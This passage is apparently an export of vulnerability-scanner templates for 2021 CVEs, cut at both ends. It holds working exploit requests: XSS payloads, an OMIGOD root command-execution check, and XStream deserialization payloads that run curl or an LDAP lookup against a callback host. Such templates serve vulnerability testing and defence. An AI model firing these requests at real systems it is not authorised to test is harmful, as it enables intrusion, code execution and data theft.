cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2021-37704\n cwe-id: CWE-668,CWE-200\n epss-score: 0.00547\n epss-percentile: 0.76969\n cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: phpfastcache\n product: phpfastcache\n tags: cve2021,cve,exposure,phpfastcache,phpinfo,phpsocialnetwork\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php\"\n - \"{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"PHP Extension\"\n - \"PHP Version\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '>PHP Version <\\/td>([0-9.]+)'\n part: body\n# digest: 4a0a00473045022100ef2253e929975a34d563cf49ee7d028f01b7b8ca671e9e6062d5b2e76c1b96ce0220201a5a0ee0a5890537e41ca1f1c7aad20a621a30e07153368fec670ab9cf4355:922c64590222798bb761d5b6d8e72950", "hash": "1756d3fec2799941e075eeb8b7f8737e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308390" }, "name": "CVE-2021-37833.yaml", "content": "id: CVE-2021-37833\n\ninfo:\n name: Hotel Druid 3.0.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/dievus/CVE-2021-37833\n - https://www.hoteldruid.com\n - 
https://nvd.nist.gov/vuln/detail/CVE-2021-37833\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-37833\n cwe-id: CWE-79\n epss-score: 0.0019\n epss-percentile: 0.55493\n cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: digitaldruid\n product: hoteldruid\n tags: cve2021,cve,hoteldruid,xss,digitaldruid\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1'\n - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1'\n - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1'\n - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022049e77e74d7aa840c78bbc69fb100df9024897e4f9f0d9da80142b94f41067170022023e19aae9ff59fbcc630d762ee87f2ad1060e790de1227e9d1ea3819ee33d6d5:922c64590222798bb761d5b6d8e72950", "hash": "f83a7c4dbdef16c3172965d261683cd3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308391" }, "name": "CVE-2021-38314.yaml", "content": 
"id: CVE-2021-38314\n\ninfo:\n name: WordPress Redux Framework <=4.2.11 - Information Disclosure\n author: meme-lord\n severity: medium\n description: WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: |\n Update WordPress Redux Framework to version 4.2.12 or later.\n reference:\n - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/\n - https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c\n - https://blog.sorcery.ie/posts/redux_wordpress/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38314\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-38314\n cwe-id: CWE-916,CWE-200\n epss-score: 0.00153\n epss-percentile: 0.51586\n cpe: cpe:2.3:a:redux:gutenberg_template_library_\\&_redux_framework:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: redux\n product: gutenberg_template_library_\\&_redux_framework\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,redux\n\nhttp:\n - raw:\n - |\n GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n 
GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"len(body)<50\"\n\n - type: regex\n name: meme\n part: body\n regex:\n - '[a-f0-9]{32}'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - '[a-f0-9]{32}'\n part: body\n# digest: 4a0a004730450221009c6646056c014dae8d1474e33793e69608ec63375825749a5e8a0272759ede27022074b0a45798025f41c94b87acd1281a1359b3b367b40cbb0dc29e5b447b387ccf:922c64590222798bb761d5b6d8e72950", "hash": "6d18e3e904062ca427f72c037b448a33", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308392" }, "name": "CVE-2021-38540.yaml", "content": "id: CVE-2021-38540\n\ninfo:\n name: Apache Airflow - Unauthenticated Variable Import\n author: pdteam\n severity: critical\n description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.\n impact: |\n An attacker can exploit this vulnerability to import malicious variables, potentially gaining unauthorized access to sensitive data.\n remediation: Upgrade to Apache Airflow 2.1.3 or higher.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38540\n - https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E\n - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E\n - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2%40%3Cannounce.apache.org%3E\n - https://github.com/WhooAmii/POC_to_review\n classification:\n cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-38540\n cwe-id: CWE-306,CWE-269\n epss-score: 0.01445\n epss-percentile: 0.8529\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apache\n product: airflow\n shodan-query: title:\"Sign In - Airflow\"\n tags: cve2021,cve,apache,airflow,rce,intrusive\n\nhttp:\n - raw:\n - |\n GET /login/ HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n - |\n POST /variable/varimport HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\n Referer: {{RootURL}}/admin/variable/\n\n ------WebKitFormBoundaryB874qcjbpxTP1Hj7\n Content-Disposition: form-data; name=\"csrf_token\"\n\n {{csrf}}\n ------WebKitFormBoundaryB874qcjbpxTP1Hj7\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\n Content-Type: application/json\n\n {\n \"type\": \"{{randstr}}\"\n }\n\n ------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains(body_1, \"Sign In\")\n - status_code_2 == 302\n - contains(header_2, \"session=.\")\n condition: and\n\n - type: word\n words:\n - 'You should be redirected automatically to target URL: '\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - type=\"hidden\" value=\"(.*?)\">\n internal: true\n# digest: 4a0a0047304502203de2b7d77a5529f357bcb560788f606818ec0078bd7dcc73e59424f576c7942b022100a391c11b19858fea9384a4e52929faca2c4b92472a5ce98f7ec6c5c8394c238a:922c64590222798bb761d5b6d8e72950", "hash": "c8bf18a3c938fb9a09af173729cfdaf2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308393" }, "name": "CVE-2021-38647.yaml", "content": "id: CVE-2021-38647\n\ninfo:\n name: Microsoft Open Management Infrastructure - Remote Code Execution\n author: daffainfo,xstp\n severity: critical\n description: Microsoft Open Management Infrastructure 
is susceptible to remote code execution (OMIGOD).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges.\n remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.\n reference:\n - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647\n - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647\n - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/\n - https://github.com/microsoft/omi\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-38647\n cwe-id: CWE-287\n epss-score: 0.97408\n epss-percentile: 0.99918\n cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: azure_automation_state_configuration\n tags: cve2021,cve,rce,omi,microsoft,kev\n\nhttp:\n - raw:\n - |\n POST /wsman HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/soap+xml;charset=UTF-8\n\n \n \n HTTP://{{Hostname}}/wsman/\n http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\n \n http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\n \n http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\n 102400\n uuid:00B60932-CC01-0005-0000-000000010000\n PT1M30S\n \n \n \n \n root/scx\n \n \n \n \n aWQ=\n \n 0\n true\n \n \n \n\n matchers:\n - type: word\n words:\n - ''\n - 'uid=0(root) gid=0(root) groups=0'\n condition: and\n# digest: 4a0a0047304502206af18db77891961bb08ab842031ca9857e34aeb1ecac121d6e3a2658d0def036022100f3712fcda08491956c1e412cd46636040d1853b3d659d0f1ac3dc1319f8a3456:922c64590222798bb761d5b6d8e72950", "hash": "398fb15a2cc3f3cba548a70a8149cde9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308394" }, "name": "CVE-2021-38702.yaml", 
"content": "id: CVE-2021-38702\n\ninfo:\n name: Cyberoam NetGenie Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2021/Aug/20\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38702\n - http://www.cyberoamworks.com/NetGenie-Home.asp\n - http://packetstormsecurity.com/files/163859/Cyberoam-NetGenie-Cross-Site-Scripting.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-38702\n cwe-id: CWE-79\n epss-score: 0.00626\n epss-percentile: 0.76687\n cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cyberoamworks\n product: netgenie_c0101b1-20141120-ng11vo_firmware\n tags: cve2021,cve,cyberoam,netgenie,xss,router,seclists,packetstorm,cyberoamworks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dab8ab75c1d3700a4c024ce898811f0c0b7996a779ae942f9fc9188869df37cd02210081e4282e11fdf1602ccae821ef099b54a525e0b35d859eda274a52c43b18dbd2:922c64590222798bb761d5b6d8e72950", "hash": "62d40091834bf3a9c3bf2e5173411450", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf308395" }, "name": "CVE-2021-38704.yaml", "content": "id: CVE-2021-38704\n\ninfo:\n name: ClinicCases 7.3.3 Cross-Site Scripting\n author: alph4byt3\n severity: medium\n description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/sudonoodle/CVE-2021-38704\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38704\n - https://github.com/judsonmitchell/ClinicCases/releases\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-38704\n cwe-id: CWE-79\n epss-score: 0.00141\n epss-percentile: 0.48901\n cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cliniccases\n product: cliniccases\n shodan-query: http.title:\"ClinicCases\",html:\"/cliniccases/\"\n tags: cve,cve2021,xss,cliniccases\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100a40d9a2b0cb51dca3b3b675cf715f18ccc4bd7714edd7220f7ec9bd934962f330220442c8f143684b18004b46f89d1886b6905cbb55977566ce1452887fcfd509d4f:922c64590222798bb761d5b6d8e72950", "hash": "d7f04ed97d5814f6fcccb02a221a17f1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308396" }, "name": "CVE-2021-38751.yaml", "content": "id: CVE-2021-38751\n\ninfo:\n name: ExponentCMS <= 2.6 - Host Header Injection\n author: dwisiswant0\n severity: medium\n description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM.\n impact: |\n An attacker can manipulate the Host header to perform various attacks, including phishing, session hijacking, and cache poisoning.\n remediation: |\n Upgrade ExponentCMS to a version higher than 2.6 or apply the provided patch to fix the Host Header Injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38751\n - https://github.com/exponentcms/exponent-cms/issues/1544\n - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n cvss-score: 4.3\n cve-id: CVE-2021-38751\n cwe-id: CWE-116\n epss-score: 0.00242\n epss-percentile: 0.62095\n cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: exponentcms\n product: exponentcms\n tags: cve2021,cve,exponentcms\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n headers:\n Host: '{{randstr}}.tld'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{randstr}}.tld'\n - 'EXPONENT.PATH'\n - 'EXPONENT.URL'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100d403330f10efac52c9115d6f86b8203afbd89a11548fcabd8cbb223b1901297b022100f557cc58343805a3b938dfc6b41aa4bdc6656b57ac2bfad9ed9eab9f15359a89:922c64590222798bb761d5b6d8e72950", "hash": "8c3c330062675ed86408940875c693a7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308397" }, "name": "CVE-2021-39141.yaml", "content": "id: CVE-2021-39141\n\ninfo:\n name: XStream 1.4.18 - Remote Code Execution\n author: pwnhxl\n severity: high\n description: |\n XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Upgrade XStream to a version that is not affected by CVE-2021-39141.\n reference:\n - http://x-stream.github.io/CVE-2021-39141.html\n - https://x-stream.github.io/CVE-2021-39141.html\n - https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2\n - https://security.netapp.com/advisory/ntap-20210923-0003/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39141\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 8.5\n cve-id: CVE-2021-39141\n cwe-id: CWE-434\n epss-score: 0.25418\n epss-percentile: 0.96584\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve,cve2021,xstream,deserialization,rce,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n 2\n \n 3\n \n java.lang.Comparable\n \n \n false\n \n \n \n \n java.lang.Comparable\n compareTo\n \n java.lang.Object\n \n \n \n \n \n 0\n \n \n PLAIN\n \n \n \n false\n \n int\n \n hash\n java.lang.String\n \n \n false\n \n \n hash\n \n \n \n java.lang.String\n \n javax.naming.InitialContext\n 
doLookup\n \n java.lang.String\n \n \n \n \n \n \n serialPersistentFields\n \n [Ljava.io.ObjectStreamField;\n \n serialPersistentFields\n java.lang.String\n \n \n \n \n CASE_INSENSITIVE_ORDER\n \n java.util.Comparator\n \n CASE_INSENSITIVE_ORDER\n java.lang.String\n \n \n \n \n serialVersionUID\n \n long\n \n serialVersionUID\n java.lang.String\n \n \n \n \n value\n \n [C\n \n value\n java.lang.String\n \n \n \n \n hash\n \n int\n \n \n \n \n \n \n serialPersistentFields\n \n [Ljava.io.ObjectStreamField;\n \n \n \n \n CASE_INSENSITIVE_ORDER\n \n java.util.Comparator\n \n \n \n \n serialVersionUID\n \n long\n \n \n \n \n value\n \n [C\n \n \n \n \n hash\n \n \n \n false\n java.lang.String\n \n \n \n \n java.lang.Object\n \n false\n \n false\n \n \n \n false\n \n \n \n \n \n \n \n false\n false\n \n \n \n \n \n ldap://{{interactsh-url}}/#evil\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"timestamp\"\n - \"com.thoughtworks.xstream\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 490a00463044022053f0426292580652f55e357f2b98bfc3e5eeb27cdf9a41d9687c48bc8ec58bf7022066c4195bc224aeee315f7711243b2ddb5212f9f4a9a41ac581fd5066d8a9b5c7:922c64590222798bb761d5b6d8e72950", "hash": "e8d54bf4f01e15413bb70c62cafd8a12", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308398" }, "name": "CVE-2021-39144.yaml", "content": "id: CVE-2021-39144\n\ninfo:\n name: XStream 1.4.18 - Remote Code Execution\n author: pwnhxl,vicrack\n severity: high\n description: |\n XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. 
Setups which followed XStream's security recommendations with an allow-list are not impacted.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade XStream to a version that is not affected by CVE-2021-39144.\n reference:\n - https://x-stream.github.io/CVE-2021-39144.html\n - https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh\n - https://security.netapp.com/advisory/ntap-20210923-0003/\n - https://nvd.nist.gov/vuln/detail/cve-2021-39144\n - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 8.5\n cve-id: CVE-2021-39144\n cwe-id: CWE-306,CWE-502\n epss-score: 0.96272\n epss-percentile: 0.99425\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n 2\n \n 3\n \n java.lang.Comparable\n \n true\n java.lang.Comparable\n \n \n \n java.lang.Comparable\n compareTo\n \n java.lang.Object\n \n \n \n \n \n java.lang.Runtime\n exec\n \n java.lang.String\n \n \n \n \n \n \n \n curl http://{{interactsh-url}}\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 490a0046304402200e05acfab9074cc5b7b2f6b1f1ba33cf96f6e5fdd55e6e4ff88cea344d39ad3f02205722ce0e0e82affb85fe8a8b2843770329e2cb843008904feebf64127bb7ddc9:922c64590222798bb761d5b6d8e72950", "hash": "1e0c4588d87bd4fb6517c642870cd985", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308399" }, "name": "CVE-2021-39146.yaml", "content": "id: CVE-2021-39146\n\ninfo:\n 
name: XStream 1.4.18 - Arbitrary Code Execution\n author: pwnhxl\n severity: high\n description: |\n XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade XStream to a version that is not affected by CVE-2021-39146.\n reference:\n - https://x-stream.github.io/CVE-2021-39146.html\n - https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f\n - https://security.netapp.com/advisory/ntap-20210923-0003/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39146\n - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 8.5\n cve-id: CVE-2021-39146\n cwe-id: CWE-434\n epss-score: 0.27391\n epss-percentile: 0.96375\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,xstream,deserialization,rce,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n test\n \n \n \n \n 0.75\n 525\n \n 700\n 0\n \n \n \n zh_CN\n \n \n \n \n \n \n \n \n \n \n 0.75\n 525\n \n 700\n 1\n lazyValue\n \n javax.naming.InitialContext\n doLookup\n \n ldap://{{interactsh-url}}/#evil\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n test\n \n test\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"timestamp\"\n - 
\"com.thoughtworks.xstream\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100833e5bcb2f394e9487e537025c26bcfbcc2b936b06eb1849e65851e1d44d86da022100b217b08be73723a93bb1293669baa2cb9859cc6954ad0ac642642a99e07df0d8:922c64590222798bb761d5b6d8e72950", "hash": "326aae365c7fc42cdc8b17e2f25e7f83", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839a" }, "name": "CVE-2021-39152.yaml", "content": "id: CVE-2021-39152\n\ninfo:\n name: XStream <1.4.18 - Server-Side Request Forgery\n author: pwnhxl\n severity: high\n description: |\n XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services.\n remediation: |\n Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability.\n reference:\n - https://x-stream.github.io/CVE-2021-39152.html\n - https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2\n - https://security.netapp.com/advisory/ntap-20210923-0003/\n - https://nvd.nist.gov/vuln/detail/cve-2021-39152\n - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 8.5\n cve-id: CVE-2021-39152\n cwe-id: CWE-502\n epss-score: 0.01242\n epss-percentile: 0.83992\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: 
cve2021,cve,xstream,ssrf,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n http://{{interactsh-url}}/internal/\n GBK\n 1111\n b\n 0\n 0\n \n \n \n \n \n http://{{interactsh-url}}/internal/\n \n 1111\n b\n 0\n 0\n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Java\"\n# digest: 490a00463044022066c9ce151ee358bbe8455f9b617c8364fb827e63a620fb317affb71e693de0e102200a11031cf4158ec89817f2f860b0878dd4f93c94685a0e1e5d0a7ce837143d39:922c64590222798bb761d5b6d8e72950", "hash": "241626789ab83dd2a204329f3f447181", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839b" }, "name": "CVE-2021-39165.yaml", "content": "id: CVE-2021-39165\n\ninfo:\n name: Cachet <=2.3.18 - SQL Injection\n author: tess\n severity: medium\n description: |\n Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. 
